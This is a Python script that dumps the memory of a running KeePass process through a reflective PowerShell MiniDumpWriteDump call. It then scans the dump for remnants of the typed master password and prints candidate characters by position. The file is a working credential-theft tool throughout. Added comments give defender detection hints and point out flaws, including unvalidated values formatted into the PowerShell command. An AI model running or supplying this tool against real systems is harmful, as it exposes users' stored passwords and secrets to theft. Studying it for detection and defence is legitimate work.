keepassdump.py
import subprocess
from subprocess import check_output
import psutil
import re
import time
def dumper(process='keepass', file='kpd.tmp'):
    """Write a memory dump of *process* into the TEMP directory and return its path.

    Windows-only: the command is handed to ``subprocess.call`` as a single
    string with ``shell=False``, which only works as a command line on Windows.

    Args:
        process: Name passed to PowerShell's ``Get-Process``.
        file: File name of the dump, created inside ``$env:TEMP``.

    Returns:
        The expected dump path as a string. The path is built independently of
        the dump step, so it is returned even when the dump failed.
    """
    # Author's note: AMSI will catch this if the target process is lsass.
    #
    # The PowerShell one-liner reflects into the non-public
    # System.Management.Automation.WindowsErrorReporting+NativeMethods type to
    # reach MiniDumpWriteDump, opens a FileStream under $env:TEMP and dumps the
    # process with dump type 2 (MiniDumpWithFullMemory in MINIDUMP_TYPE).
    #
    # Defender view: the full script text is on the powershell.exe command
    # line, so process-creation auditing with command-line capture and
    # PowerShell script-block logging both record the 'MiniDumpWriteDump'
    # reflection lookup; the dump file itself is a second artifact.
    #
    # NOTE(review): `file` and `process` are formatted into the script text
    # without any quoting or validation, so both must be trusted values.
    c = '''$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting');$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic');$Flags = [Reflection.BindingFlags] 'NonPublic, Static';$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags);$p=$env:TEMP;$ProcessDumpPath = $p+'\{}';$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create);$p=Get-Process {};$Result = $MiniDumpWriteDump.Invoke($null, @($p.Handle,$p.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero));$FileStream.Close()'''.format(
        file, process
    )
    cmd = "powershell -c " + c
    # NOTE(review): the exit status is stored but never inspected, so a failed
    # or blocked dump is not reported to the caller.
    returned_value = subprocess.call(cmd, shell=False)
    # A second child process (cmd.exe) expands %TEMP% to rebuild the path on
    # the Python side; presumably it resolves to the same directory PowerShell
    # used, since both children inherit this process's environment.
    out = subprocess.run(["cmd", "/c", "echo", "%TEMP%"], stdout=subprocess.PIPE)
    path = str(out.stdout.decode('utf-8').strip())
    filepath = path + '\\' + file
    return filepath
def open_proc(proc='KeePass.exe'):
    """Report whether *proc* is running, trying to start it when it is not.

    Args:
        proc: Executable name compared against psutil's process names and
            appended to the ``start`` command line.

    Returns:
        1 if a process with that name is already listed,
        2 if a ``cmd /c start`` attempt returned exit status 0,
        3 if no attempt returned 0.
    """
    # Short-circuits on the first matching name, like a membership test on a
    # generator would.
    if any(entry.name() == proc for entry in psutil.process_iter()):
        return 1

    # Default install directories of KeePass 2.x (64-bit and 32-bit).
    install_dirs = (
        'C:\\Program Files\\KeePass Password Safe 2',
        'C:\\Program Files (x86)\\KeePass Password Safe 2',
    )
    for directory in install_dirs:
        launch = 'cmd /c start /D "{}" {}'.format(directory, proc)
        # Only the exit status of the `start` command is checked; nothing here
        # confirms that the process is actually up afterwards.
        status = subprocess.call(launch, shell=False)
        if status == 0:
            return 2
    return 3
def get_passwords(file):
    """Scan a dump file for masked-input residue and print candidates per position.

    The scan looks for the byte pair 0xCF 0x25 (207, 37), which is how U+25CF
    is laid out in UTF-16LE, and treats a printable ASCII byte that follows a
    run of such pairs as a candidate character. Each candidate is filed under
    the run length plus one. Results are printed, not returned.

    Defender view: any full-memory dump of a password manager should be
    handled as secret material, because plain scans like this one can pull
    typed-input remnants out of it.

    NOTE(review): the nesting below was reconstructed from a listing that had
    lost its indentation -- confirm against the original file.

    Args:
        file: Path of the dump file; it is read into memory in one call.
    """
    print("finding passwords...")
    with open(file, "rb") as f:
        contents = f.read()
        length = len(contents)
        passChar = "*"
        # Number of 0xCF 0x25 pairs seen in the current run.
        current_len = 0
        # Only ever appended to or cleared; its single consumer is the
        # commented-out print below.
        debugStr = ""
        # Maps position -> list of distinct candidate characters.
        pass_char = {}
        # Position 1 is pre-filled with "*". The loop can only file a candidate
        # after at least one pair was counted, so it never writes below 2.
        pass_char[1] = ["*"]
        for i in range(0, length) :
            # Stop one byte early because the body reads contents[i+1].
            if i == length-1:
                break
            b = contents[i]
            b2 = contents[i+1]
            if (b == 207) and (b2 == 37):
                # Rebinding i does not skip anything: range() supplies the next
                # index regardless, so the 0x25 byte is visited on its own next.
                i+=1
                current_len += 1
                debugStr += passChar;
            else:
                if current_len == 0:
                    continue
                else :
                    try :
                        # Inspect the single byte after the current one.
                        c = contents[i+1:i+2].decode('utf-8')
                        # Non-raw literal: the pattern is the printable ASCII
                        # range, space through '~'.
                        x = re.search("^[\x20-\x7E]+$", c)
                        if x :
                            current_len +=1
                            if current_len not in pass_char.keys():
                                pass_char[current_len] = []
                            if c not in pass_char[current_len] :
                                pass_char[current_len].append(c)
                                #print(debugStr+c)
                        else :
                            current_len = 0
                            debugStr = ""
                            continue
                    except:
                        # A lone byte >= 0x80 (such as 0xCF itself) fails to
                        # decode and lands here; the run counter is kept, which
                        # lets consecutive pairs accumulate.
                        # NOTE(review): a bare except also swallows
                        # KeyboardInterrupt and every other error.
                        continue
                    # A candidate was filed, so the run ends here.
                    current_len = 0
                    debugStr = ""
    print("Password Position and Char")
    for k in pass_char.keys() :
        print(f"{k} : {pass_char[k]}")
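def main():
    """Run the script end to end: find or start the process, dump it, scan the dump.

    ``open_proc`` returns 1 when the process is already running, 2 when it was
    just started, and 3 otherwise. In the last case nothing is dumped and the
    function returns without output.

    The dump file produced by ``dumper`` is not removed afterwards, so it stays
    on disk as an artifact holding the target process's memory.
    """
    r = open_proc()
    if r == 1:
        print("Process is running")
        fp = dumper()
    elif r == 2:
        print("Process is spawned, waiting for 10s")
        # Fixed delay before dumping the freshly started process.
        time.sleep(10)
        fp = dumper()
    else:
        # Stop here: no dump was produced, so `fp` is unbound and the lines
        # below must not run. A bare `exit` expression would not stop anything.
        return
    print(f"Process memomry dumped: {fp}")
    print(fp)
    get_passwords(fp)


if __name__ == "__main__":
    main()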